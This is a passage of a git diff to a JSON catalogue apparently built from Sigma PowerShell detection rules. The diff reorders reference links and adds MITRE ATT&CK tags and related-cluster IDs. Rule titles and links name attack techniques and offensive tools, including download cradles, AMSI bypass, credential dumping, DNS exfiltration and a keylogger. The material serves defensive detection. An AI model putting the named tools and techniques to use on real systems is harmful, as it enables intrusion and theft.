"https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content", + "https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_windows_capability.yml" ], "tags": [ @@ -28486,8 +28851,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://attack.mitre.org/datasources/DS0005/", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gwmi.yml" ], "tags": [ @@ -28520,8 +28885,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", + "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml" ], "tags": [ @@ -28797,8 +29162,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml" ], "tags": [ @@ -28864,9 +29229,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt", - "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" ], "tags": [ @@ -28899,8 +29264,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md", "https://techgenix.com/malicious-powershell-scripts-evade-detection/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml" ], "tags": [ @@ -29018,9 +29383,9 @@ "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2020/10/08/ryuks-return", - "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", - "https://powersploit.readthedocs.io/en/stable/Recon/README", "https://adsecurity.org/?p=2277", + "https://powersploit.readthedocs.io/en/stable/Recon/README", + "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" ], "tags": [ @@ -29128,8 +29493,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", "https://www.ietf.org/rfc/rfc2821.txt", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml" ], @@ -29163,9 +29528,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" ], "tags": [ @@ -29233,8 +29598,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" ], "tags": [ @@ -29400,11 +29765,11 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", + "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", "http://woshub.com/manage-windows-firewall-powershell/", "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", - "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", + "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" ], "tags": [ @@ -29437,8 +29802,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml" ], "tags": [ @@ -29594,10 +29959,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://youtu.be/5mqid-7zp8k?t=2481", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" ], "tags": [ @@ -29790,8 +30155,20 @@ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1620" + ] }, + "related": [ + { + "dest-uuid": "4933e63b-9b77-476e-ab29-761bc5b7d15a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", "value": "Potential In-Memory Execution Using Reflection.Assembly" }, @@ -29884,9 +30261,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", "https://adsecurity.org/?p=2604", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" ], "tags": [ @@ -30202,8 +30579,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package", "https://twitter.com/WindowsDocs/status/1620078135080325122", + "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml" ], "tags": [ @@ -30462,8 +30839,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/NathanMcNulty/status/1569497348841287681", "https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps", + "https://twitter.com/NathanMcNulty/status/1569497348841287681", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml" ], "tags": [ @@ -30661,9 +31038,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/samratashok/ADModule", "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges", "https://twitter.com/cyb3rops/status/1617108657166061568?s=20", + "https://github.com/samratashok/ADModule", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml" ], "tags": [ @@ -30688,8 +31065,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", + "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" ], "tags": [ @@ -30723,8 +31100,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", "https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml" ], "tags": [ @@ -31115,8 +31492,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://o365blog.com/aadinternals/", "https://github.com/Gerenios/AADInternals", + "https://o365blog.com/aadinternals/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml" ], "tags": [ @@ -31371,8 +31748,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml" ], "tags": [ @@ -31405,8 +31782,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", "https://www.offensive-security.com/metasploit-unleashed/timestomp/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" ], "tags": [ @@ -31472,8 +31849,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" ], "tags": [ @@ -31506,8 +31883,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml" ], "tags": [ @@ -31540,8 +31917,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://attack.mitre.org/datasources/DS0005/", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml" ], "tags": [ @@ -31574,8 +31951,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", + "https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml" ], "tags": [ @@ -31598,8 +31975,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml" ], "tags": [ @@ -31655,9 +32032,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/oroneequalsone/status/1568432028361830402", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", + "https://twitter.com/oroneequalsone/status/1568432028361830402", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" ], "tags": [ @@ -31726,8 +32103,20 @@ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_frombase64string_archive.yml" ], - "tags": "No established tags" + "tags": [ + "attack.command_and_control", + "attack.t1132.001" + ] }, + "related": [ + { + "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "df69cb1d-b891-4cd9-90c7-d617d90100ce", "value": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script" }, @@ -31777,9 +32166,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ + "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" ], "tags": [ @@ -31812,8 +32201,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", "https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_export_certificate.yml" ], @@ -31880,8 +32269,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", + "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml" ], "tags": [ @@ -32117,8 +32506,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" ], "tags": [ @@ -32186,8 +32575,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/nas_bench/status/1537919885031772161", "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", + "https://twitter.com/nas_bench/status/1537919885031772161", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml" ], "tags": [ @@ -32220,9 +32609,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1087.002/T1087.002.md", - "https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer", + "https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1087.002/T1087.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml" ], "tags": [ @@ -32263,8 +32652,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", "https://github.com/harleyQu1nn/AggressorScripts", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml" ], "tags": [ @@ -32406,10 +32795,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", + "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" ], "tags": [ @@ -32475,9 +32864,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", - "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", + "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml" ], "tags": [ @@ -32810,8 +33199,8 @@ "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content", - "https://twitter.com/ScumBots/status/1610626724257046529", "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0", + "https://twitter.com/ScumBots/status/1610626724257046529", "https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml" ], @@ -32846,8 +33235,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml" ], "tags": [ @@ -32950,8 +33339,20 @@ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_download_com_cradles.yml" ], - "tags": "No established tags" + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3c7d1587-3b13-439f-9941-7d14313dbdfe", "value": "Potential COM Objects Download Cradles Usage - PS Script" }, @@ -33009,24 +33410,24 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", - "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/adrecon/ADRecon", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/samratashok/nishang", - "https://github.com/DarkCoderSc/PowerRunAsSystem/", - "https://adsecurity.org/?p=2921", "https://github.com/Kevin-Robertson/Powermad", "https://github.com/adrecon/AzureADRecon", - "https://github.com/HarmJ0y/DAMP", - "https://github.com/adrecon/ADRecon", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/besimorhino/powercat", + "https://adsecurity.org/?p=2921", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/DarkCoderSc/PowerRunAsSystem/", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" ], "tags": [ @@ -33201,9 +33602,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", - "https://github.com/GhostPack/Rubeus", "https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus", + "https://github.com/GhostPack/Rubeus", + "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hktl_rubeus.yml" ], "tags": [ @@ -33360,13 +33761,25 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", + "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ] }, + "related": [ + { + "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "504d63cb-0dba-4d02-8531-e72981aace2c", "value": "Suspicious X509Enrollment - Ps Script" }, @@ -33524,8 +33937,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/Arno0x/DNSExfiltrator", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh", + "https://github.com/Arno0x/DNSExfiltrator", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml" ], "tags": [ @@ -33625,8 +34038,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - 